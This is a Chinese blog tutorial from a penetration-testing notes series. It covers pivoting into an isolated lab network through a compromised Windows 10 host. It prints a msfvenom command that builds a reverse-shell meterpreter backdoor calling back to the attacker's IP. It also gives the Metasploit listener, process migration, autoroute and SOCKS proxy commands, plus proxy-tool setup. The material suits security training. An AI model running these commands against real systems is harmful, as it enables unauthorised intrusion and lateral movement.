使用代理访问内网:实验二

于 2024-07-31 08:30:00 发布
阅读量739 收藏 19
点赞数 24
分类专栏: 渗透测试笔记 文章标签: 经验分享 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/140750943
版权

 

目录

环境搭建

内网搭建(win2019)

跳板机搭建(win10)

实验步骤

1. win10上线kali

2. 借助msf做代理

3. 在攻击机上做个代理,访问目标网站

4. 使用SocksCap64工具,进行sock4a隧道的连接

5. 启用socksCap64的系统代理

6. 设置burpsuite的上游代理

攻击机是本机和kali:192.168.109.139

内网机器Windows server 2019:10.10.10.10 仅主机

跳板机器Windows 10,两张网卡,一张仅主机:10.10.10.20,一张NAT:192.168.109.100

假设当前已经拿到windows10的主机权限,要访问Windows2019的web

环境搭建

添加一个VMware的自定义网卡“VMnet2”

内网搭建(win2019)

这里选自定义的VMnet2

搭建内网的web服务

配置 10.10.10.10的静态IP地址

控制面板——网络和internet——网络和共享中心

打开服务器管理器,点击“添加角色和功能”,下载IIS

一直下一步之后到了下面的页面勾选下载IIS,然后一直下一步安装即可

返回服务器管理器,点击右上角的工具,再点第一个IIS管理器

右击网站,选择添加网站

网站名随便起一个,网站根目录随便选,IP就是刚才设置的静态IP,点击确定

进入到网站根目录,新建一个.txt文件修改名字 为index.html

用记事本打开,随便写一些内容

访问网站

可以看到网站搭建成功

跳板机搭建(win10)

配置2个网卡

  • 配置静态IP:10.10.10.20和192.168.109.100
  • 自定义VMnet2——10.10.10.20
  • nat模式——192.168.109.100

如果是只有一张网卡就再添加一张

添加好之后和前面方法一样

控制面板——网络和internet——网络连接

Ethernet0对应着网卡 自定义VMnet2,配置IP为10.10.10.20

Ethernet1对应着网卡nat模式,配置IP为192.168.109.100(这里网段每个人可能不一样,要看自己的虚拟机的虚拟网络编辑器里NAT模式对应的IP网段)

Ethernet0

Ethernet1

实验步骤

1. win10上线kali

msf生成后门,反连上线

在kali使用msf工具

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.109.139 lport=4455 -f exe > r.exe

木马程序r.exe在kali的家目录下

在kali开启msf监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.109.139
set lport 4455
run

把家目录下的 r.exe 拖到本机桌面,再拖进win10桌面,点击木马程序

会发现kali这边监听成功了

先做进程迁移,防止掉线

ps
migrate 6856		//迁移到vm tools的进程里

2. 借助msf做代理

我们要在跳板机上做个代理,设置一个路由

run autoroute -s 10.10.10.0/24
run autoroute -p

绑定之后,做一个socks代理,使用socks_proxy模块

bg
use auxiliary/server/socks_proxy
set version 4a
run

3. 在攻击机上做个代理,访问目标网站

用Google浏览器代理插件开启代理

访问目标网站

虽然可以访问了,但是我们的burp还是抓不到包的,因为我们的浏览器是走sock4a这条隧道出去的,但是不会走这条隧道回来;

那么,我们就要设置一下上游代理才能做到的包的抓取,让他们进行通信

4. 使用SocksCap64工具,进行sock4a隧道的连接

用管理员身份运行工具

打开程序面板内的浏览器,访问目标机,也是可以访问的到的(如果没有你想用的浏览器,就添加程序,或者把本机浏览器的快捷方式长按拖进程序面板)

5. 启用socksCap64的系统代理

右下角任务栏,右击sockscap,系统代理 --> 启用系统代理

6. 设置burpsuite的上游代理

sockscap的系统代理端口:25378

用浏览器代理插件,再次访问目标网站

燕雀安知鸿鹄之志哉.
关注
专栏目录
局域网内通过代理服务器上网的详细设置
11-04
局域网内通过代理服务器上网的详细设置。在局域网内没有路由器,或者在局域网内想避开限制,让其他计算机通过某一台计算机上网的话可以采用这种方法。
内网服务器通过代理上网
xiaofei0859的专栏
12-16 4264
1. 安装proxychains vim ./proxychains.conf  找到[ProxyList]  #把端口改成你要用的。  socks5 127.0.0.1 7070  错误: 1.ERROR: ld.so: object 'libproxychains.so' from LD_PRELOAD cannot be preloaded: ignored. 查找/b
内网服务器使用代理上网
weixin_46810673的博客
04-11 6647
内网服务器使用代理上网 要求:一台内网服务器可以ping通的机器
随时随地通过代理访问内部服务器(tfcenter)
qq_40905836的博客
02-27 1万+
通过代理访问内部服务器(tfcenter)
局域网代理上网
中国智造2025
02-28 1942
对做工程的工程师而言,控制室无法上网,但是工控机需要更新或下载一些软件。如果此时自己的笔记本电脑能上网,那么就可以使用代理上网的方式使工控机也能上网。下面是步骤1.用网线把两台电脑连接起来2.在可以上网的笔记本上为本地连接设置一个ip地址,比如192.168.2.226下载ccproxy代理软件,设置如下3.在工控机上为本地连接设置一个同网段的ip地址,比如192.168.2.230然后设置代理i...
实现内网服务器通过同局域网的代理服务器上网
克隆大菠萝的超市
08-03 1万+
一.场景描述: 1.以下安装环境均在Linux系统下! 2.现在有若干台云服务器,其中一台分配了外网IP地址,其余服务器只分配了内网IP地址,准备用来搭建内网服务(如数据库,后台接口等)使用,现为了安装部署便利,要求没有分配外网地址的服务器同样可以访问外网。 .解决方法: 1.首先在分配了外网地址的服务器上,搭建Socks5 Proxy代理服务,具体步骤参考以下博文: 《在Linux上...
内网渗透讲解与实验手册
05-16
- **实验2:Htran.exe端口转发** - **实验3:ReDuh端口转发** - **实验4:HD.exe反弹socks代理** - **实验5:MSF进内网渗透** #### 三、实验1:LCX端口转发 **实验环境描述:** - **基本信息:** LCX转发WinWeb...
内网渗透工具-反向代理nps使用分析
m0_72121223的博客
07-11 7542
内网渗透 反向代理 NPS 流量分析
内网安全:隧道技术详解
zz12345600354的博客
04-29 1063
Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 371
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
52-5 内网代理2 - LCX端口转发(不推荐使用LCX)
最新发布
weixin_43263566的博客
07-07 174
LCX是一种基于Socket套接字实现的端口转发工具,提供了适用于Windows和Linux的两个版本。在正常的Socket隧道中,必须同时存在两端:一个作为服务端,监听特定端口并等待客户端连接;另一个作为客户端,主动连接到服务端指定的IP地址和端口。测试环境如下图所示:右侧的Windows Server 2012是一个拥有公网IP地址的Web服务器;左侧的Kali Linux是攻击机。
配置使用 Snat 实现内网代理上网
民工哥的博客
10-09 927
点击关注公众号,回复“1024”获取2TB学习资源!NAT 全名是 Network Address Translation,字面上的意思是网络地址转换,它还可以分为源地址转换(SNAT)和...
电脑设置代理IP,上网怎么使用代理
2301_77578770的博客
12-29 1372
如果使用非法获取的代理IP,可能会导致违法行为的后果。因此,我们应选择正规的代理服务器提供商,并遵守相关规定。1. 确保代理服务器的稳定性。在使用代理IP时,我们需要确保代理服务器的IP地址和端口号是正确的。(5)在弹出的对话框中,勾选“为LAN使用代理服务器”选项,并输入代理服务器的IP地址和端口号。(3)在文件中找到需要设置代理IP的网络接口,例如eth0。在Windows系统中,代理IP的设置方法略有不同。在Linux系统中,代理IP的设置方法也有所不同。(3)在弹出的对话框中,选择“连接”标签页。
Linux:Nginx 正向代理实现内网访问互联网
热门推荐
清泉影月
10-21 1万+
因为公司的某些系统需要访问互联网上的某些功能,每个系统的服务器都开通访问互联网的能力太麻烦并且不方便管理,所以打算只对一台服务器开通访问互联网的能力,并在此服务器基础上搭建 nginx 正向代理,方便其他系统可以使用该服务器作为代理借道访问互联网功能。
内网安全代理技术详解
qq_61553520的博客
06-03 9196
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
BurpSuite扫内网
LainWith的博客
11-19 3640
目录burpsuite设置socks5代理访问内网burpsuite设置上游代理访问内网1. msfvenom生成木马2. 跳板机win2012运行木马3. msf获取shell4. msf起路由5. 配置socks_proxy6. 配置windwos6.1 测试win7联通内网web6.2 设置BurpSuite 纸上得来终觉浅,绝知此事要躬行。网上资料怎么写的都有,花了大半天时间整理了一下???? burpsuite设置socks5代理访问内网 测试环境如下: 注意事项:关闭跳板机win2012的
非常易于理解的搭建内网nginx代理服务器方法
weixin_33786077的博客
12-25 177
如题,做个备忘。首先从tengine官网下载最新版tengine。戳这儿把这个tengine装好,配置文件里这样改server name ~^(.*);别忘记后面这个半角分号,表示任意请求地址,location ~^(.*) { set $b $http_host; proxy_pass http://$b;}表示请求的是什么url就由这台proxyserver去访问,...
openEuler 22.03 LTS系统搭建局域网上网代理服务器
forestqq的博客
07-27 1380
生产网环境的一个痛点就是与外网隔离,内网的服务器如果需要进行补丁升级或者下载更新软件,比较困难,本文讲解在生产网中能访问公网的openEuler 22.03 LTS系统服务器上搭建代理服务器,供内网其它服务器连接公网,同时介绍了常用的三种浏览器的代理服务器设置方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值